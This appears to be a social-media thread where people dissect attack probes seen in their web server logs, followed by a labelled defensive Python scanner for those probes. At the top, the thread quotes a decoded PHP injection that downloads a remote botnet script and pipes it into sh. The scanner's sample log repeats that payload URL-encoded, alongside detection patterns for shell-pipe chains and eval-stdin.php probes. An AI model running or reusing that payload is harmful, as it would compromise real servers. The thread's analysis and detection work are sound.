Decodes to:
cat_id=${system(wget -qO- http://74.194.191.52/rondo.wcr.sh|sh)}
I have to admire the use of POSIX-compliant shell.
Payload is here if anyone is curious: https://pastes.io/wcrrondosh
Obviously don't run it, but I love that if you get down far enough it will try to execute a Motorola 68k binary
4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"
That's not how you spell xmlrpc, and that's not where WordPress puts that
I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol
Based on nginx logs there is a package called phpunit which ships a file called, and I am 100% serious, `eval-stdin.php`.
Feels like security research is 10% the most intense shit you've ever seen and 90% "oh no! we left the untrusted strings next to the String Executor!"
@wren6991 I briefly researched this at one point (as I've also seen this in my logs)
Turns out that this was a part of their test suite that wasn't supposed to be shipped on any public pages. So in most cases it was downstream's fault for leaving the composer package directory below the webroot, I suppose?
PHP is full of really idiotic gotchas like this, I swear there's no reason for the structure to be like this
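Added example, not posted by anyone in the thread: a small Python scanner that pulls the three indicators discussed above out of combined-format access logs: the URL-encoded `${system(...)}` injection in a query string, the `wget ... | sh` download-and-execute chain inside it, and requests for `eval-stdin.php` or the `xmrlpc.php` typo-squat. It URL-decodes repeatedly so a double-encoded `%2524` still comes out as `$`, and it leaves a real WordPress `/xmlrpc.php` request alone. Only the `4.217.221.207` line is quoted from the thread; every other sample line is constructed for the demo, the `/vendor/phpunit/phpunit/src/Util/PHP/` path is the conventional composer location and is an assumption, and the 203.0.113.x / 198.51.100.x addresses are documentation ranges.

```python
"""Flag the probes discussed in this thread in nginx/Apache combined access logs."""
import re
from urllib.parse import unquote_plus

# Combined log format: ip ident user [time] "method target proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+ "[^"]*" "[^"]*"$'
)

# PHP string-interpolation code injection, e.g. ${system(...)} or ${eval(...)} in a parameter
INTERP_CALL_RE = re.compile(r'\$\{\s*(system|exec|passthru|shell_exec|popen|eval)\s*\(', re.I)
# "fetch a script and pipe it straight into a shell" one-liners
DOWNLOAD_PIPE_RE = re.compile(r'\b(wget|curl)\b[^|;]*\|\s*(sh|bash)\b', re.I)
# Files only scanners ask for: the phpunit test helper and the xmlrpc.php typo-squat
PROBE_FILES = {"eval-stdin.php", "xmrlpc.php"}

SAMPLE_LOG = [
    # Quoted from the thread:
    '4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"',
    # Constructed: the ${system(...)} payload from the thread as it would appear URL-encoded in a log
    '203.0.113.7 - - [12/Nov/2025:23:30:01 +0000] "GET /index.php?cat_id='
    '%24%7Bsystem%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.wcr.sh%7Csh%29%7D'
    ' HTTP/1.1" 200 512 "-" "-"',
    # Constructed: probe for the phpunit helper at the conventional composer path (path is an assumption)
    '203.0.113.7 - - [12/Nov/2025:23:30:02 +0000] '
    '"POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 146 "-" "-"',
    # Constructed: benign traffic that must not be flagged
    '198.51.100.2 - - [12/Nov/2025:23:31:00 +0000] "GET /xmlrpc.php HTTP/1.1" 200 42 "-" "WordPress/6.0"',
    '198.51.100.2 - - [12/Nov/2025:23:31:05 +0000] "GET /index.php?cat_id=12 HTTP/1.1" 200 8190 "-" "Mozilla/5.0"',
]


def fully_decode(s, max_rounds=3):
    """URL-decode until the string stops changing, so %2524 -> %24 -> $ is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def classify(target):
    """Return (decoded request target, list of reasons it looks like one of the probes)."""
    raw_path, _, raw_query = target.partition("?")  # split before decoding so an encoded '?' stays in the path
    path, query = fully_decode(raw_path), fully_decode(raw_query)
    decoded = f"{path}?{query}" if raw_query else path
    reasons = []
    if path.rsplit("/", 1)[-1].lower() in PROBE_FILES:
        reasons.append(f"probe for {path.rsplit('/', 1)[-1].lower()}")
    if INTERP_CALL_RE.search(query):
        reasons.append("PHP ${func(...)} injection in query")
    if DOWNLOAD_PIPE_RE.search(decoded):
        reasons.append("download-and-pipe-to-shell")
    return decoded, reasons


def scan(lines):
    """Parse each combined-format line and keep those whose request target matches an indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        decoded, reasons = classify(m["target"])
        if reasons:
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ip']} {f['status']} {f['decoded']}  <- {', '.join(f['reasons'])}")
```

The 404s are worth keeping alongside the 200s: a 404 on `eval-stdin.php` means the scanner missed, but a 200 on the same path is exactly the downstream mistake described above (vendor directory left under the webroot), so the status column is the first thing to check when one of these fires.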
Security conference talks fall into two categories
* we designed a distributed entropy siphon to perform a black-box hypervisor side channel escape and chain-load a persistent rootkit into the CPU cache
* we looked behind the sofa and found an entire industry of products/services that have made no attempt at security at all and are therefore vulnerable to the most basic issues that we've been finding in everything for the past 30 years, and no-one else had bothered to look.